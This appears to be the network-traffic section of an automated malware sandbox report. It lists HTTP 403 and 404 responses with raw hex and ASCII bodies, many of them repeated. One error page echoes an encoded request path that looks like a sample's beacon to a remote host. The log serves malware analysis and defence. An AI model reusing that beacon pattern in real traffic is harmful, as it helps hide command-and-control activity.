                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 12 Sep 2024 13:05:52 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeServer: nginxX-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffStrict-Transport-Security: max-age=63072000; includeSubDomainsContent-Encoding: gzipData Raw: 39 65 0d 0a 1f 8b 08 00 00 00 00 00 04 03 3d 8e cd 0a c2 30 10 84 ef 7d 8a a1 97 de 0c 0a 5e 24 e6 22 f6 e6 45 7d 81 90 ac 6d a8 64 eb 6e aa f8 f6 56 91 ce 6d 7e 3e 18 db 6f dc 29 a9 a6 dc 81 05 29 07 16 a1 50 70 b8 9c 5b 04 e6 21 11 ca 7b a4 95 35 f3 b4 b2 23 c2 dd ab ee 6b 12 61 a9 5d 85 59 56 8b 70 ee dc f1 9b ed 60 cd df ff ca 6b 4f 10 7a 4c a4 85 22 7c 8c 42 aa 0b d2 98 f5 90 b6 a6 59 18 bc bc 22 73 c1 8d a7 1c c1 19 a5 4f 0a 25 79 92 cc 2f 46 57 7d 00 ce cb 33 48 b5 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 9e=0}^$"E}mdnVm~>o))Pp[!{5#ka]YVp`kOzL"|BY"sO%y/FW}3H0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Sep 2024 13:05:55 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeServer: nginxX-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffStrict-Transport-Security: max-age=63072000; includeSubDomainsData Raw: 31 32 63 0d 0a 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 20 20 20 20 3c 73 74 72 6f 6e 67 3e 45 72 72 6f 72 3a 20 3c 2f 73 74 72 6f 6e 67 3e 0a 20 20 20 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 61 64 64 72 65 73 73 20 3c 73 74 72 6f 6e 67 3e 27 2f 31 6b 69 35 2f 3f 33 74 56 3d 67 73 43 71 31 6c 57 4a 46 31 64 67 50 5a 6f 59 41 4c 73 50 63 4e 56 4a 59 4c 6f 57 6f 6b 5a 6c 54 74 42 68 62 69 56 38 73 7a 45 38 79 68 6b 59 73 48 76 6d 54 56 4f 4b 65 44 66 67 51 66 6e 78 39 49 72 4d 6b 65 36 2f 73 32 47 66 51 46 74 5a 31 73 31 51 4e 52 63 4a 71 56 66 4f 65 33 48 37 67 6a 7a 31 55 77 73 58 55 51 38 73 4e 4f 4e 75 61 55 54 68 4b 6b 51 3d 26 61 6d 70 3b 49 68 6b 54 62 3d 78 50 66 48 47 30 6f 38 6b 5a 49 38 27 3c 2f 73 74 72 6f 6e 67 3e 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 12c<h2>Not Found</h2><p class="error"> <strong>Error: </strong> The requested address <strong>'/1ki5/?3tV=gsCq1lWJF1dgPZoYALsPcNVJYLoWokZlTtBhbiV8szE8yhkYsHvmTVOKeDfgQfnx9IrMke6/s2GfQFtZ1s1QNRcJqVfOe3H7gjz1UwsXUQ8sNONuaUThKkQ=&amp;IhkTb=xPfHG0o8kZI8'</strong> was not found on this server.</p>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 12 Sep 2024 13:06:01 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e bd 0e 82 30 14 85 f7 3e c5 95 5d 2e 1a c6 a6 83 02 91 04 91 98 32 38 62 7a 4d 49 90 22 2d 1a df de 02 8b e3 f9 fb 72 f8 26 b9 1c e5 ad 4a e1 24 cf 05 54 f5 a1 c8 8f 10 6c 11 f3 54 66 88 89 4c d6 64 1f 46 88 69 19 08 c6 b5 7b 76 82 6b 6a 94 17 ae 75 1d 89 38 8a a1 34 0e 32 33 f5 8a e3 6a 32 8e 4b 89 df 8d fa ce bb 9d f8 eb 78 c5 f8 20 a4 26 18 e9 35 91 75 a4 a0 be 16 f0 69 2c f4 9e f5 98 59 60 7a 70 ba b5 60 69 7c d3 18 72 1c fc 0c 17 a2 c7 cf 4f d8 0f f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: acM0>].28bzMI"-r&J$TlTfLdFi{vkju8423j2Kx &5ui,Y`zp`i|rO|<0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 12 Sep 2024 13:06:03 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e bd 0e 82 30 14 85 f7 3e c5 95 5d 2e 1a c6 a6 83 02 91 04 91 98 32 38 62 7a 4d 49 90 22 2d 1a df de 02 8b e3 f9 fb 72 f8 26 b9 1c e5 ad 4a e1 24 cf 05 54 f5 a1 c8 8f 10 6c 11 f3 54 66 88 89 4c d6 64 1f 46 88 69 19 08 c6 b5 7b 76 82 6b 6a 94 17 ae 75 1d 89 38 8a a1 34 0e 32 33 f5 8a e3 6a 32 8e 4b 89 df 8d fa ce bb 9d f8 eb 78 c5 f8 20 a4 26 18 e9 35 91 75 a4 a0 be 16 f0 69 2c f4 9e f5 98 59 60 7a 70 ba b5 60 69 7c d3 18 72 1c fc 0c 17 a2 c7 cf 4f d8 0f f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: acM0>].28bzMI"-r&J$TlTfLdFi{vkju8423j2Kx &5ui,Y`zp`i|rO|<0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 12 Sep 2024 13:06:06 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e bd 0e 82 30 14 85 f7 3e c5 95 5d 2e 1a c6 a6 83 02 91 04 91 98 32 38 62 7a 4d 49 90 22 2d 1a df de 02 8b e3 f9 fb 72 f8 26 b9 1c e5 ad 4a e1 24 cf 05 54 f5 a1 c8 8f 10 6c 11 f3 54 66 88 89 4c d6 64 1f 46 88 69 19 08 c6 b5 7b 76 82 6b 6a 94 17 ae 75 1d 89 38 8a a1 34 0e 32 33 f5 8a e3 6a 32 8e 4b 89 df 8d fa ce bb 9d f8 eb 78 c5 f8 20 a4 26 18 e9 35 91 75 a4 a0 be 16 f0 69 2c f4 9e f5 98 59 60 7a 70 ba b5 60 69 7c d3 18 72 1c fc 0c 17 a2 c7 cf 4f d8 0f f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: acM0>].28bzMI"-r&J$TlTfLdFi{vkju8423j2Kx &5ui,Y`zp`i|rO|<0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 12 Sep 2024 13:06:09 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 196Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Sep 2024 13:06:28 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" 
href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Sep 2024 13:06:30 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" 
href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Sep 2024 13:06:33 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" 
href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Sep 2024 13:06:36 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" 
href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Sep 2024 13:07:18 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Sep 2024 13:07:21 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Sep 2024 13:07:24 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Sep 2024 13:07:26 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Sep 2024 13:18:44 GMTServer: ApacheUpgrade: h2Connection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 4761Content-Type: text/html; charset=utf-8
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Sep 2024 13:18:46 GMTServer: ApacheUpgrade: h2Connection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 4786Content-Type: text/html; charset=utf-8
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Sep 2024 13:18:49 GMTServer: ApacheUpgrade: h2Connection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 12974Content-Type: text/html; charset=utf-8
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Sep 2024 13:18:51 GMTServer: ApacheUpgrade: h2Connection: Upgrade, closeVary: Accept-EncodingTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Thu, 12 Sep 2024 13:07:54 GMTConnection: closeContent-Length: 315Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Thu, 12 Sep 2024 13:07:57 GMTConnection: closeContent-Length: 315Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Thu, 12 Sep 2024 13:07:59 GMTConnection: closeContent-Length: 315Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
